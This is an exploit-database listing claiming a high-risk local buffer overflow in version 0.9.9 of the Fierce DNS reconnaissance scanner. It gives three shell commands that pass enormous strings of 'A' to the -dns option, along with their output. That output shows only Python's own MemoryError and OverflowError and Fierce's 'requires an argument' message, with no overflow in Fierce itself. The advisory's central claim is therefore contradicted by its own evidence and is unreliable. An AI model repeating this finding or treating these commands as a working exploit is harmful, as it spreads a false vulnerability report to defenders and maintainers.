Fierce Buffer Overflow

2017.11.12
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

################ #Exploit Title: Fierce Buffer Overflow #Exploit Author : Persian Hack Team #Discovered by: Mojtaba MobhaM (MojtabaKazemi) #Vendor HomePage: http://www.ha.ckers.org/fierce/ #Version : 0.9.9 - Beta #Tested on: Kali #Date: 11-11-2017 #Category: Application #Description: Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It's really meant as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network. Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That's especially useful in targeted malware. ############################### #fierce -dns $(python -c 'print "A"*10') Uhm, no. "AAAAAAAAAA" is gimp. A bad domain can mess up your day. Try again. Exiting... #fierce -dns $(python -c 'print "A"*999999999999999') Traceback (most recent call last): File "<string>", line 1, in <module> MemoryError Option dns requires an argument You have to use the -dns switch with a domain after it. Type: perl fierce.pl -h for help Exiting... #fierce -dns $(python -c 'print "A"*9999999999999999999') Traceback (most recent call last): File "<string>", line 1, in <module> OverflowError: cannot fit 'long' into an index-sized integer Option dns requires an argument You have to use the -dns switch with a domain after it. Type: perl fierce.pl -h for help Exiting... ###############################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top